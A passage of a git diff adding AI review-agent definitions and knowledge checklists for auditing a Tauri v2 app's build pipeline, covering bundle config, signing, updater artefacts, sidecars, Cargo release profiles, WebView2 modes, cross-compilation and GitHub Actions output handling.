+- Windows NSIS: any OS with `cargo-xwin`, but `windows-latest` is simplest.
+- Linux AppImage / Deb / RPM: `ubuntu-latest` (with the right `apt` deps).
+
+A matrix that builds a Windows MSI on `ubuntu-latest` is misconfigured; flag it.
+
+### `wf-runner-self-hosted-only-for-private`
+
+Self-hosted runners on a public repo are a security hazard (see `sec-policy-no-self-hosted-on-public-repo`). For private repos, self-hosted is fine but pin runner labels narrowly so a compromised runner can't pick up jobs from another team's workflow.
+
+## Network resilience — `wf-net-*`
+
+### `wf-net-retry-flaky-installs`
+
+Network-dependent steps (apt installs, brew installs, npm registry pulls, GitHub release downloads) are flaky on a 1-3% rate. For critical installs, wrap in a 2-attempt retry:
+
+```bash
+attempt=1; max=2
+while [ $attempt -le $max ]; do
+  npm ci && break
+  attempt=$((attempt+1))
+done
+[ $attempt -gt $max ] && exit 1
+```
+
+Or use a maintained action with retry (`nick-fields/retry@<sha>`). Don't retry test runs — flaky tests should be fixed, not retried.
+
+### `wf-net-platform-known-flake-categories`
+
+Known flaky categories on GitHub-hosted runners:
+- macOS `bundle_dmg.sh` / `hdiutil` (tauri-apps/tauri#3055) — wrap with `killall Finder` + detach-stale-mounts pre-flight.
+- Windows WebView2 detection — re-run usually works.
+- `apt-get update` 5xx from mirrors — retry.
+
+Document the wrapper retry; explain *why* it exists (link to the upstream issue).
+
+## Output discipline — `wf-output-*`
+
+### `wf-output-no-set-output-deprecated`
+
+`echo "::set-output name=X::Y"` was deprecated in 2022 and removed in 2024. Use `$GITHUB_OUTPUT`:
+
+```bash
+echo "version=1.2.3" >> "$GITHUB_OUTPUT"
+```
+
+`set-output` lines either error out or silently ignore in current runners — workflows that still use them are broken.
+
+### `wf-output-quote-github-output-path`
+
+When writing multiline values to `$GITHUB_OUTPUT`, use the heredoc form:
+
+```bash
+{
+  echo "notes<<EOF"
+  cat release-notes.md
+  echo "EOF"
+} >> "$GITHUB_OUTPUT"
+```
+
+Single-line `echo "key=$value" >> $GITHUB_OUTPUT` breaks on newlines or `=` in the value.
+
+### `wf-output-mask-derived-secrets`
+
+If a step computes a value from a secret and that value should also be redacted, emit `::add-mask::<value>` before exposing it. See `secrets-add-mask-derived-values` in the security knowledge file.

--- a/.claude/agents/tauri-build-expert/agent.md
+++ b/.claude/agents/tauri-build-expert/agent.md
@@ -1,0 +1,58 @@
+---
+name: tauri-build-expert
+description: Reviews the Tauri v2 build pipeline — bundle config, signing, updater, sidecar staging, Cargo release profile, cross-compilation, and platform installer settings.
+knowledge_tags: [build-system, signing, updater, bundle, tauri-v2]
+project_docs: [architecture, security, features]
+---
+
+**Goal:** catch defects in the build/distribute path — broken installers, unsigned artefacts, unverifiable updater bundles, oversized binaries, missing platform-specific flags, drift between `tauri.conf.json`, capability ACL, and shipped assets.
+
+This agent is **separate from** `tauri-coding-expert` (runtime API correctness) and `tauri-architect-expert` (component boundaries). It owns *how the binary is produced and shipped*, not what runs inside it.
+
+**Protocol:** dispatch one subagent per knowledge file below; each gets ONLY that file + the diff and cites rules from it; you aggregate, dedupe overlaps, surface cross-doc patterns. Always dispatch (uniform). No recursion.
+
+## Knowledge sources
+
+**Generic, bundled with the agent (always loaded):**
+
+- [`./knowledge/tauri-build-config.md`](knowledge/tauri-build-config.md) — `bundle-*`, `assets-*`, `hooks-*`, `sidecar-*`, `caps-build-*` rule families (build configuration surface).
+- [`./knowledge/tauri-signing-and-updater.md`](knowledge/tauri-signing-and-updater.md) — `sign-*`, `updater-*` rule families (per-platform signing, notarization, updater artefacts, manifest schema, install modes).
+- [`./knowledge/tauri-bundle-size.md`](knowledge/tauri-bundle-size.md) — `cargo-*`, `xcompile-*`, `webview-*` rule families (Cargo release profile, WebView2 distribution, cross-compilation, `removeUnusedCommands`).
+
+**Project-specific deep-dives (optional, declared via category):**
+
+This agent's frontmatter lists `project_docs: [architecture, security, features]`. At review time, look up each category in the host repo's `AGENTS.md` under the **Agent project-doc manifest** section. Load the mapped file (or every `*.md` if mapped to a folder). `architecture` typically defines capability ACL + IPC chokepoints; `security` typically defines CSP and signing posture; `features` typically describes installation, updates, and CLI/file-association behaviour the build must produce. If `AGENTS.md` is absent, the manifest section is missing, the category is unmapped, or the target file does not exist, skip silently.
+
+**Project-specific tagged knowledge (optional, tag-filtered):**
+
+If the host repo has a `docs/best-practices-project/` directory, scan every `*.md` file there. Load any whose `tags` overlap this agent's `knowledge_tags`. If absent, skip silently.
+
+**Always check:**
+
+- `bundle.externalBin` paths actually resolve to a binary with the correct `-$TARGET_TRIPLE` suffix for *every* target the build produces. Drift between targets and staged sidecar binaries silently aborts the build with `resource path "binaries/..." doesn't exist`.
+- `tauri.conf.json > version` and `Cargo.toml > [package].version` are kept in sync (or one is a documented derivation of the other). Skew silently ships installers labelled with the wrong version.
+- `bundle.createUpdaterArtifacts` is set when `plugins.updater.endpoints` is configured — otherwise no `.sig` files are produced, every published `latest.json` references signatures that don't exist, and every client fails update verification.
+- Every entry in `bundle.icon` exists on disk and is platform-appropriate (`.ico` for Windows, `.icns` for macOS, PNG for Linux).
+- `bundle.fileAssociations[].ext` does not include a leading dot.
+- macOS: `bundle.macOS.signingIdentity` is `"-"` (ad-hoc) or a real identity, never empty/null without a documented env-var fallback. Verify in CI with `codesign -dv --verbose=4` + `grep Signature=`.
+- Windows: `bundle.windows.nsis` and `bundle.windows.wix` are not both populated unless the maintainer deliberately ships both `.msi` and `-setup.exe`.
+- A `beforeBuildCommand` that produces files the Rust build needs (staged sidecar, `dist/`) is wired identically into `beforeBundleCommand` if a split-build pipeline ever calls `tauri bundle` directly.
+- Capability files match the runtime IPC surface — a `#[tauri::command]` with no matching capability permission is dead code (or, with `removeUnusedCommands`, silently stripped).
+
+**Out of scope (handoff):**
+
+- Tauri runtime API correctness (`invoke`, `emit_to`, `listen`) → `tauri-coding-expert`.
+- Layer leaks, IPC chokepoint bypass, store design → `tauri-architect-expert`.
+- Exploit paths in shipped IPC handlers / FS scopes → `tauri-security-expert` (this agent flags *unsigned artefacts* and *missing CSP at build time*; runtime exploit analysis stays with the security expert).
+- Renderer JS bundle size → `performance-expert` (this agent flags Tauri-side bundle bloat — Cargo profile, WebView2 install mode, sidecar duplication).
+- CI/CD workflow correctness (matrix shape, runner choice, secret handling) → `github-actions-expert`. This agent reviews what a *correct* build needs from CI; the GHA expert reviews how the workflow delivers it.
+
+**Output:**
+
+```
+## Build review
+### Critical / High / Medium / Low
+- [file:line] finding — violates rule N in <doc-or-knowledge-file> — fix: <one line>
+### Already sound
+- <specific build pattern held in code, with citation>
+```

--- a/.claude/agents/tauri-build-expert/knowledge/tauri-build-config.md
+++ b/.claude/agents/tauri-build-expert/knowledge/tauri-build-config.md
@@ -1,0 +1,208 @@
+---
+tags: [build-system, bundle, tauri-v2]
+source: Tauri v2 official documentation (https://v2.tauri.app/), summarised
+---
+
+# Tauri v2 Build Configuration
+
+Project-agnostic audit checklist for `tauri.conf.json` (and the equivalent JSON5 / TOML formats) and the build pipeline it drives. Cite a rule by its `<rule-id>`. Rule IDs are stable; the file path is local to whichever agent has bundled this knowledge.
+
+> **Scope:** Tauri v2 only — `bundle`, `build`, `app.security`, capability/permission build-time wiring, sidecar (`externalBin`), resources, file associations. Runtime IPC/event correctness lives in `tauri-v2-patterns.md` (used by `tauri-coding-expert` and `tauri-architect-expert`).
+>
+> **References:** [`tauri.conf.json` reference](https://v2.tauri.app/reference/config/), [Distribute](https://v2.tauri.app/distribute/), [Sidecar](https://v2.tauri.app/develop/sidecar/), [Resources](https://v2.tauri.app/develop/resources/), [Capabilities](https://v2.tauri.app/security/capabilities/), [Configuration files](https://v2.tauri.app/develop/configuration-files/).
+
+## Bundle config — `bundle-*`
+
+### `bundle-active-on-when-shipping`
+
+`bundle.active` defaults to `false`. A release build with `active: false` produces only the binary — no `.app`, `.dmg`, `.msi`, `.nsis.zip`, `.AppImage`, etc. Releases that ship installers MUST set `bundle.active: true`. CI logs that say "build succeeded" but produce no installer are usually this rule violated.
+
+### `bundle-targets-explicit`
+
+`bundle.targets` defaults to `"all"`, which expands per-platform. Pin to an explicit array (e.g. `["app", "dmg", "nsis"]`) when you know which formats you actually ship. `"all"` causes:
+
+- Linux builds to produce AppImage + Deb + RPM even if only one is distributed (~30 MB wasted, minutes of CI).
+- Windows builds to produce both MSI (WiX) and NSIS, which is rarely intended.
+
+Drift between `bundle.targets` and the actual download links published in your release notes is a documentation-vs-code bug; flag it.
+
+### `bundle-identifier-stable`
+
+`identifier` (top-level, reverse-DNS, e.g. `com.example.myapp`) is the bundle ID on macOS, the application ID on Windows installer, and the WebView data-dir name. **It MUST NOT change between releases** — changing it makes existing installs fail to upgrade, leaks WebView data, and on macOS produces a separate Dock icon. The only legitimate change is when shipping a deliberately separate flavour (e.g. `com.example.myapp.beta`) via a `tauri.<env>.conf.json` overlay or the `--config` CLI flag.
+
+### `bundle-version-single-source-of-truth`
+
+The app version is read from `tauri.conf.json > version`, falling back to `Cargo.toml > [package].version` when unset. Pick **one** source — never set both with different values. CI workflows that mutate one without the other silently ship installers labelled with the wrong version. A canary/preview workflow that patches both files is fine *only* if the two writes are atomic (same step, same matrix entry).
+
+### `bundle-icon-paths-resolve`
+
+Every entry in `bundle.icon` is read at build time. A missing path aborts the build with a misleading error. The list MUST contain at least one platform-appropriate entry per shipped target — `.icns` for macOS, `.ico` for Windows, PNGs at multiple resolutions for Linux. Don't ship placeholder 1×1-pixel icons; macOS Finder refuses to display them.
+
+### `bundle-file-associations-ext-no-dot`
+
+`bundle.fileAssociations[].ext` strips a leading `.` automatically, but the schema is permissive and tooling that round-trips the value (e.g. shell scripts that grep the config) breaks on the dotted form. Canonical: `["md", "mdx"]`, never `[".md", ".mdx"]`.
+
+### `bundle-macos-signing-identity-explicit`
+
+`bundle.macOS.signingIdentity` MUST be set when shipping macOS bundles outside the App Store. Acceptable values:
+
+- `"-"` — ad-hoc signature (works on Apple Silicon for users who clear quarantine; the right call for OSS apps that don't pay for a Developer ID).
+- `"Developer ID Application: Name (TEAMID)"` — full Developer ID certificate.
+- `null`/unset → falls back to the `APPLE_SIGNING_IDENTITY` env var.
+
+Leaving the field `null` and forgetting the env var produces an unsigned `.app` that macOS refuses to launch on first download with no actionable diagnostic. CI MUST verify post-build with `codesign -dv --verbose=4 <path>.app 2>&1 | grep -q 'Signature=adhoc'` (or `Authority=`), and verify the embedded sidecar binaries the same way — Gatekeeper rejects bundles whose embedded binaries are unsigned even if the outer bundle is signed.
+
+### `bundle-macos-entitlements-when-needed`
+
+`bundle.macOS.entitlements` is required when the app uses sandbox-restricted capabilities (camera, microphone, `app-sandbox`). A missing entitlements file with a sandboxed API call is a runtime crash on first invocation. Each entitlement key MUST appear with the correct value type (`<true/>`, `<string>...</string>`); a misspelled key is silently ignored.
+
+### `bundle-macos-hardened-runtime`
+
+`bundle.macOS.hardenedRuntime` defaults to `true` and SHOULD stay `true`. Disabling it skips the runtime protections required for notarization. Only flip to `false` for local development bundles you do not ship.
+
+### `bundle-windows-installer-mode`
+
+`bundle.windows.nsis.installMode` is one of `currentUser` / `perMachine` / `both`:
+
+- `currentUser` is the right default for desktop apps because it avoids the UAC prompt and writes to `%LOCALAPPDATA%`.
+- `perMachine` requires admin rights and writes to Program Files; pick it only for IT-managed deployments.
+- `both` lets the user choose at install time but doubles the test matrix.
+
+### `bundle-windows-webview-install-mode`
+
+`bundle.windows.webviewInstallMode.type` defaults to `downloadBootstrapper` (~0 MB extra, requires internet at install time). Pick deliberately:
+
+| Mode | Extra size | Internet needed | Notes |
+|---|---|---|---|
+| `downloadBootstrapper` | 0 MB | yes | Default. Fine for online installs on Windows 10/11. |
+| `embedBootstrapper` | ~1.8 MB | yes | Preferred for `.msi` distribution to Windows 7 (TLS-1.2 caveat). |
+| `offlineInstaller` | ~127 MB | no | Required for offline / air-gapped environments. |
+| `fixedRuntime` | ~180 MB | no | Pin a specific WebView2 build; managed-update environments only. |
+| `skip` | 0 MB | no | **Never correct for shipping.** App silently fails to launch when WebView2 is absent. |
+
+### `bundle-windows-msi-vs-nsis`
+
+`.msi` (WiX) and `-setup.exe` (NSIS) are independent installer formats, not alternatives. Setting both `bundle.windows.wix` and `bundle.windows.nsis` produces *both* installers from one `tauri build`. Pick one and pin via `bundle.targets` (`["msi"]` or `["nsis"]`) unless you deliberately distribute both. NSIS supports cross-compile from Linux/macOS via `cargo-xwin`; WiX is Windows-only.
+
+### `bundle-resources-explicit-paths`
+
+`bundle.resources` (array or map form) copies files into the bundle's `$RESOURCE` dir. Audit the patterns:
+
+- `"dir/"` recurses; `"dir/*"` does not. `"dir/**"` and `"dir/**/**"` are **errors** (they only match directories, not files).
+- A glob with no matching files at build time silently embeds nothing — use the map form to make intent explicit when shipping a small fixed set.
+- Resource files are read-only at runtime; the app SHOULD use `app.path().resolve(..., BaseDirectory::Resource)`, never a hardcoded path under `Contents/Resources` or `resources\`.
+
+### `bundle-create-updater-artifacts-required`
+
+`bundle.createUpdaterArtifacts` MUST be `true` (or `"v1Compatible"` during migration) when `plugins.updater.endpoints` is configured. With the flag off, `tauri build` does not produce `.sig` files, the published `latest.json` references signatures that don't exist, and every client hits "signature verification failed" on update check. The string `"v1Compatible"` is **temporary** — it will be removed in v3, so leave a `// TODO migrate to true` only if you deliberately support v1 clients in the field.
+
+## Hooks — `hooks-*`
+
+### `hooks-before-build-vs-before-bundle`
+
+`build.beforeBuildCommand` runs before `tauri build` (which compiles Rust + bundles). `build.beforeBundleCommand` runs before the bundling phase only — useful for `tauri bundle` invocations that skip compilation. If your hook produces files the Rust build *needs* (e.g. a staged sidecar binary, a generated `dist/`), it MUST be the `beforeBuildCommand` (or wired into both, identically). Hooks declared only in `beforeBundleCommand` are silently skipped during full `tauri build`.
+
+### `hooks-conditional-env-vars`
+
+`TAURI_ENV_PLATFORM`, `TAURI_ENV_ARCH`, `TAURI_ENV_FAMILY`, `TAURI_ENV_PLATFORM_VERSION`, `TAURI_ENV_PLATFORM_TYPE`, `TAURI_ENV_DEBUG` are set inside hooks. Use them to gate platform-specific work. Hooks that shell out unconditionally and assume a host (e.g. `bash` on a Windows runner where it isn't installed) are a portability bug.
+
+### `hooks-no-side-channel-state`
+
+Hooks MUST be idempotent and MUST NOT mutate state that survives the build (no committing generated files, no global tool installs, no writing to `$HOME/.config`). A hook that leaves the workspace dirty silently breaks the next build — both locally and in CI cache restoration.
+
+### `hooks-frontend-dist-must-exist`
+
+`build.frontendDist` is a path (or URL) to the bundled web assets — typically `../dist`. The path MUST exist at the time `tauri build` runs the bundling phase. If `beforeBuildCommand` is responsible for producing it (`npm run build`), removing or skipping that hook silently produces a Tauri build that ships an empty webview.
+
+## Sidecar / externalBin — `sidecar-*`
+
+### `sidecar-target-triple-suffix-required`
+
+A sidecar binary listed in `bundle.externalBin` (e.g. `"binaries/my-cli"`) MUST exist at build time as `binaries/my-cli-<TARGET_TRIPLE>` (with `.exe` on Windows). The build script's existence check aborts with `resource path "binaries/..." doesn't exist` when the suffixed file is absent. The triple is the host's by default; cross-compiles MUST stage a binary for *each* target. A CI matrix that builds for `x86_64-pc-windows-msvc` and `aarch64-pc-windows-msvc` needs both `-x86_64-pc-windows-msvc.exe` and `-aarch64-pc-windows-msvc.exe`.
+
+### `sidecar-shell-permission-required`
+
+Spawning a sidecar requires the `shell:allow-execute` (or `shell:allow-spawn`) permission scoped to the sidecar identifier in a capability file. Adding `externalBin` without the matching capability ships a binary that the runtime refuses to spawn — silent failure, no diagnostic in production builds.
+
+### `sidecar-args-allowlist-or-deny`
+
+The capability's `args` field can be `true` (any args), `false` (no args), or an explicit ordered list (literal strings or `validator` regexes). Defaulting to `true` defeats the purpose of the sidecar permission — every command-injection bug in the renderer becomes a sandbox escape. Enumerate the args.
+
+### `sidecar-ad-hoc-sign-on-macos`
+
+Sidecar binaries embedded under `Contents/MacOS/` MUST be signed with the same identity as the parent `.app` (or ad-hoc with `-`). Gatekeeper rejects an ad-hoc app that contains a non-ad-hoc embedded binary, and vice versa. `codesign -dv` against both the `.app` and the embedded binary is the verification step; do it in CI.
+
+### `sidecar-staging-script-deterministic`
+
+A staging script (typically a `stage-cli.mjs` or shell helper) that copies a pre-built sidecar to the suffixed name MUST be deterministic and idempotent — running it twice on the same workspace must produce the same result without mutating cached artefacts. Non-deterministic staging breaks `Swatinem/rust-cache@v2` and `actions/cache` restoration.
+
+## Assets — `assets-*`
+
+### `assets-icon-platform-coverage`
+
+`bundle.icon` MUST contain at minimum: a `.ico` for Windows, a `.icns` for macOS, and at least one PNG for Linux. Tauri does **not** auto-generate platform icons from a single source at build time — `tauri icon <source>` does, but its output MUST be committed and listed explicitly. A build that ships only a `.icns` produces a generic Windows installer icon.
+
+### `assets-resource-paths-no-leak`
+
+`bundle.resources` paths are baked into the binary as relative paths under `$RESOURCE`. Don't ship absolute developer-machine paths (`/Users/alice/...`) — they leak in error messages and on macOS break bundle relocatability. Use repo-relative paths only.
+
+### `assets-info-plist-merge-order`
+
+A custom `src-tauri/Info.plist` is *merged* with Tauri's generated keys. Overwriting `CFBundleVersion` / `CFBundleShortVersionString` here is forbidden — it conflicts with `bundle.version` resolution and silently ships a wrong version. Only add app-specific keys (`NSCameraUsageDescription`, `NSAppleEventsUsageDescription`, `LSApplicationCategoryType`, etc.).
+
+## Capabilities at build time — `caps-build-*`
+
+### `caps-build-files-discovered-automatically`
+
+Files under `src-tauri/capabilities/*.json` (and `.toml`) are discovered by `tauri-build` and embedded automatically. Only the capability *identifiers* listed in `app.security.capabilities` (when set) are activated; if that array is empty, all capability files in the directory are activated. Either form is valid; pick one and stick to it. Mixing inline capabilities with file-based capabilities is allowed but doubles the audit surface — flag drift.
+
+### `caps-build-platforms-narrow`
+
+A capability with `"platforms": ["macOS"]` is silently dropped on Windows / Linux builds. This is the right primitive for platform-conditional permissions. A capability that grants a *desktop* permission with `platforms: ["iOS", "android"]` is dead code; flag it.
+
+### `caps-build-remove-unused-commands`
+
+`build.removeUnusedCommands: true` (Tauri 2 stable feature) drops commands not referenced by any capability ACL during `tauri build`. Two consequences to flag:
+
+- Adding a new `#[tauri::command]` without a matching capability permission entry causes it to be silently *removed* — calls fail at runtime with no diagnostic in production.
+- Removing the last reference to a command from capabilities silently strips it from the binary. Test the IPC surface in release mode, not just dev.
+
+### `caps-build-csp-not-disabled`
+
+`app.security.dangerousDisableAssetCspModification: true` opts out of Tauri's CSP enforcement for the asset protocol — almost never the right call. If you see this set, demand an inline comment explaining the threat model. The default (CSP enforced) is correct for shipping apps.
+
+### `caps-build-asset-protocol-scope-narrow`
+
+`app.security.assetProtocol.scope` defines which paths the renderer can read via `asset://`. A scope like `["/**/*"]` (or absent and falling back to default-allow) lets the renderer read arbitrary files if `enable: true`. Narrow the scope to the workspace allowlist, or disable the asset protocol entirely if not used.
+
+## Plugin updater wiring — `updater-build-*`
+
+(Detailed updater rules live in [`./tauri-signing-and-updater.md`](tauri-signing-and-updater.md). Build-time-only checks live here.)
+
+### `updater-build-pubkey-not-path`
+
+`plugins.updater.pubkey` MUST be the *content* of the public key file, not a path. A path-shaped value (`./pubkey.pem`) compiles but produces a runtime parse error on the first update check. Embed the contents verbatim or via a build-script substitution.
+
+### `updater-build-endpoints-https-in-production`
+
+`plugins.updater.endpoints` MUST be HTTPS in production. The `dangerousInsecureTransportProtocol: true` flag exists for local testing — never set it in a config that ships. If a workflow templates `endpoints` from a variable, the variable MUST be HTTPS-only validated at build time.
+
+### `updater-build-endpoint-fallthrough`
+
+When `endpoints` lists multiple URLs, Tauri tries each in order and stops on the first 2xx response. A 5xx on the primary endpoint silently falls through to the next; design the secondary to be a strict superset of the primary (or omit it). Listing a stale endpoint as "fallback" is a foot-gun — clients on a stale primary never see the new manifest.
+
+## Cross-compilation seam — `xcompile-build-*`
+
+(Cross-compile mechanics live in [`./tauri-bundle-size.md`](tauri-bundle-size.md). Build-config seam-checks live here.)
+
+### `xcompile-build-stage-cli-target-env`
+
+If the host repo uses a sidecar `externalBin` and a CI matrix with multiple `--target <triple>` builds, the staging script MUST receive the active target — usually via an env var threaded through the workflow. Without it, the staged binary has the host's triple suffix, the build script's existence check fails, and the matrix collapses to host-only builds.
+
+### `xcompile-build-conf-overlays`
+
+Platform-specific overlays (`tauri.linux.conf.json`, `tauri.windows.conf.json`, `tauri.macos.conf.json`, `tauri.android.conf.json`, `tauri.ios.conf.json`) merge into the base via JSON Merge Patch (RFC 7396) — a `null` value deletes the key. Use overlays for platform-only settings (NSIS hooks on Windows, DMG layout on macOS) instead of `if`-laddering build scripts.
+
+### `xcompile-build-cli-config-flag`
+
+The `tauri build --config <path-or-json>` flag merges an extra config file at invocation time (also RFC 7396). Use it for ephemeral build flavours (beta, canary) — set `productName`, `identifier`, and `version` overrides — never hand-edit the base `tauri.conf.json` from a CI step. Hand-edits break local rebuilds.

--- a/.claude/agents/tauri-build-expert/knowledge/tauri-bundle-size.md
+++ b/.claude/agents/tauri-build-expert/knowledge/tauri-bundle-size.md
@@ -1,0 +1,178 @@
+---
+tags: [build-system, bundle, tauri-v2, performance]
+source: Tauri v2 official documentation (https://v2.tauri.app/), summarised
+---
+
+# Tauri v2 Bundle Size & Cross-Compilation
+
+Project-agnostic audit checklist for binary size, Cargo release profile, WebView2 distribution, and cross-compilation. Cite a rule by its `<rule-id>`.
+
+> **Scope:** Cargo profile (release optimisation), WebView2 install mode size trade-offs, cross-compile mechanics for Tauri targets, `removeUnusedCommands` ACL pruning. Frontend JS bundle size lives in `vite-bundle-hygiene.md` (used by `performance-expert` and `lean-expert`); this file owns the Rust/Tauri side.
+>
+> **References:** [Concept: Size](https://v2.tauri.app/concept/size/), [Windows installer](https://v2.tauri.app/distribute/windows-installer/), [`removeUnusedCommands`](https://github.com/tauri-apps/tauri/pull/12890), [Cargo profiles](https://doc.rust-lang.org/cargo/reference/profiles.html).
+
+## Cargo release profile — `cargo-*`
+
+### `cargo-release-profile-aggressive`
+
+The Tauri-recommended release profile in `src-tauri/Cargo.toml` (or `Cargo.toml` if the workspace lives at root):
+
+```toml
+[profile.release]
+codegen-units = 1   # better LLVM optimisation
+lto = true          # link-time optimisation
+opt-level = "s"     # optimise for size; use "3" for speed
+panic = "abort"     # remove unwinding tables
+strip = true        # remove debug symbols
+```
+
+A default profile (no overrides) ships a binary 30-50% larger than necessary. Flag any release build that lacks at least `lto = true` and `strip = true`.
+
+### `cargo-opt-level-tradeoff`
+
+`opt-level` choices and their effect on Tauri release builds:
+
+| Value | Binary size | Runtime perf | Compile time | Notes |
+|---|---|---|---|---|
+| `0` | huge | slow | fast | Never ship. |
+| `1`–`2` | medium | medium | medium | Rarely useful. |
+| `3` | larger | fastest | slow | Pick for compute-heavy Rust hot paths. |
+| `"s"` | small | good | slow | Default for size-sensitive desktop apps. |
+| `"z"` | smallest | slower | slow | Pick only when binary size is the dominant constraint. |
+
+Document the choice with a comment when picking anything other than `"s"`.
+
+### `cargo-codegen-units-one`
+
+`codegen-units = 1` constrains LLVM to compile the crate as a single unit, enabling cross-function optimisations at the cost of compile time. For a Tauri app's release profile this is the right trade — release builds happen on CI with caching, not on developer machines. Setting `codegen-units > 1` in release without justification is a regression.
+
+### `cargo-panic-abort-when-no-catch_unwind`
+
+`panic = "abort"` removes unwinding tables (~10% binary size) but breaks `std::panic::catch_unwind`. Tauri itself does not use `catch_unwind` for IPC — a panicking command becomes a Promise rejection regardless. Flag `panic = "abort"` only if the host repo's Rust code calls `catch_unwind` directly.
+
+### `cargo-strip-true-no-debuginfo`
+
+`strip = true` removes debug symbols and section names. Combined with `[profile.release.package."*"] debug = 0` it eliminates all debug info from dependencies. For a shipped binary this is correct. **Do not** strip the debug profile — stack traces from local crashes need symbols.
+
+### `cargo-trim-paths-removes-leaks`
+
+`trim-paths = "all"` (stable in Rust 1.81+) removes absolute build-host paths from the binary (`/Users/alice/.cargo/registry/...`). These paths leak the developer's username and home directory in stack traces. Add it to the release profile when shipping reproducible / privacy-respecting builds.
+
+### `cargo-incremental-dev-only`
+
+`incremental = true` belongs in `[profile.dev]`, not release. Incremental compilation in release breaks `lto = true` and `codegen-units = 1` benefits — they compile the world from scratch anyway. A release profile with `incremental = true` is a misconfiguration; flag it.
+
+## ACL-driven dead-command pruning — `acl-*`
+
+### `acl-remove-unused-commands-flag`
+
+`build.removeUnusedCommands: true` (Tauri 2 stable) reads the activated capability files at build time, computes the union of allowed command names, and tells `generate_handler!` to drop everything else. Two effects:
+
+- **Smaller binary** — typical wins are 5-15% off the Rust binary depending on how broad the IPC surface is.
+- **Fail-closed by default** — adding a `#[tauri::command]` without a matching capability permission silently strips it. Test in release.
+
+Flag it as a recommendation when the host repo has a wide IPC surface and explicit capabilities. Flag it as a regression risk if it is **enabled** but the test suite only exercises the dev profile (debug builds skip the pruning).
+
+### `acl-capability-permission-coverage`
+
+Every `#[tauri::command]` in the handler MUST have a matching permission entry in at least one activated capability file. With `removeUnusedCommands` on, missing permissions produce silent stripping. Without the flag, missing permissions produce runtime denials. Either way, audit the full set in CI — a quick `grep '#\[tauri::command\]' src-tauri/src` vs the union of capability `permissions:` is a worthwhile build step.
+
+## WebView2 distribution — `webview-*`
+
+### `webview-install-mode-deliberate`
+
+`bundle.windows.webviewInstallMode.type` is a four-way trade-off (size vs offline vs Windows-7-compat vs supported-runtime). The full table:
+
+| Mode | Extra installer size | Internet at install | Runtime patches | Notes |
+|---|---|---|---|---|
+| `downloadBootstrapper` | 0 MB | required | system-managed | Default. Right for online installs on Windows 10/11. |
+| `embedBootstrapper` | ~1.8 MB | required | system-managed | Better Windows-7 `.msi` compat (TLS 1.2 caveat). |
+| `offlineInstaller` | ~127 MB | not needed | system-managed | Required for offline / air-gapped deploys. |
+| `fixedRuntime` | ~180 MB | not needed | maintainer-managed | Pin a specific WebView2 version. Acceptable only for managed-update environments. |
+| `skip` | 0 MB | n/a | not installed | App fails to launch when WebView2 absent. **Never ship.** |
+
+`fixedRuntime` is a maintenance commitment — the maintainer is responsible for shipping security patches via app updates. Pick it only if the host repo's threat model requires version-pinning.
+
+### `webview-fixed-runtime-path-resolves`
+
+When `webviewInstallMode.type` is `"fixedRuntime"`, the `path` field MUST point to an extracted runtime directory under `src-tauri/`. The directory must contain `EBWebView/` and the runtime files. A relative path that resolves outside `src-tauri` aborts the bundle.
+
+### `webview-download-bootstrapper-tls`
+
+The default `downloadBootstrapper` mode requires TLS 1.2 on the install host. This breaks on stock Windows 7 (TLS 1.0/1.1 only). If shipping to Windows 7, switch to `embedBootstrapper` or `offlineInstaller`.
+
+## Cross-compilation — `xcompile-*`
+
+### `xcompile-targets-rustup-pre-stage`
+
+Cross-compiling a Tauri app requires the Rust target installed on the build host:
+
+```sh
+rustup target add x86_64-pc-windows-msvc
+rustup target add aarch64-pc-windows-msvc
+rustup target add aarch64-apple-darwin
+rustup target add x86_64-apple-darwin
+```
+
+CI workflows that omit this (relying on a default toolchain) fail with `error: linker not found` or `error: failed to run custom build command for tauri-build`. Pre-stage every target the matrix builds.
+
+### `xcompile-windows-from-non-windows`
+
+Cross-compiling a Windows NSIS installer from Linux/macOS uses `cargo-xwin` as Tauri's runner:
+
+```sh
+cargo install --locked cargo-xwin
+npm run tauri build -- --runner cargo-xwin --target x86_64-pc-windows-msvc
+```
+
+Caveats:
+- **NSIS only** — `.msi` (WiX) cannot cross-compile (WiX is Windows-only).
+- **Linux** also needs `lld` + `llvm` (for `llvm-rc`) and on some distros, NSIS Stubs/Plugins from upstream binary releases.
+- **`XWIN_CACHE_DIR`** env var caches the Windows SDK between builds; without it `cargo-xwin` re-downloads ~500 MB per build.
+
+### `xcompile-arm64-windows-toolchain`
+
+`aarch64-pc-windows-msvc` requires the "MSVC v143 - VS 2022 C++ ARM64 build tools" component installed via Visual Studio Installer. Stock `windows-latest` GitHub runners include this; self-hosted Windows runners may not — verify with `cl.exe /?` for the ARM64 cross-toolchain.
+
+### `xcompile-macos-universal-not-default`
+
+macOS universal binaries (`x86_64` + `aarch64` in one bundle) are NOT the default. Tauri on `macos-latest` (Apple Silicon) builds an `aarch64`-only bundle. To produce a universal binary either:
+- Build twice (separate matrix entries for x86_64 and aarch64), or
+- Use `cargo build --target universal-apple-darwin` (requires both Rust targets installed), or
+- Run `lipo -create` post-build on the embedded binaries.
+
+If the release ships only an aarch64 bundle, document it — Intel Mac users on macOS 12 cannot run aarch64-only apps under Rosetta in all cases (especially when sidecar binaries are involved).
+
+## Sidecar staging at build time — `sidecar-stage-*`
+
+### `sidecar-stage-target-triple-env`
+
+A staging script that copies a sidecar binary to the suffixed `<name>-<triple>(.exe)?` form MUST honour an env var that names the active build target. Common pattern (cross-platform Node staging script):
+
+```js
+const target = process.env.STAGE_CLI_TARGET || execSync('rustc --print host-tuple').toString().trim();
+```
+
+A staging script that always uses `rustc --print host-tuple` produces the host's triple suffix even when `tauri build --target <other>` is in flight — the build script then aborts on the existence check.
+
+### `sidecar-stage-build-profile-coherence`
+
+The sidecar binary must be built with the **same** profile as the Tauri app: release sidecar for release Tauri build, debug sidecar for `tauri dev`. Staging a debug sidecar into a release bundle produces a 5-10× larger embedded binary that still functions but ships unstripped symbols and panic strings.
+
+### `sidecar-stage-placeholder-acceptable-when`
+
+When a build script's existence check happens *before* the real sidecar is built (e.g. during a pre-flight `cargo test --features codegen` for typed-binding generation), staging a placeholder file with the correct name is acceptable. The placeholder MUST be replaced by the real binary before the actual `tauri build`. Skipping the replacement ships a broken sidecar that exits with no useful diagnostic.
+
+## Binary size measurement — `size-*`
+
+### `size-measure-stripped`
+
+When tracking binary size, measure the **stripped release binary**, not the debug binary or the unstripped release binary. The latter two can be 3-5× larger; tracking either as the budget produces false regressions on every dependency bump.
+
+### `size-measure-installer-not-binary`
+
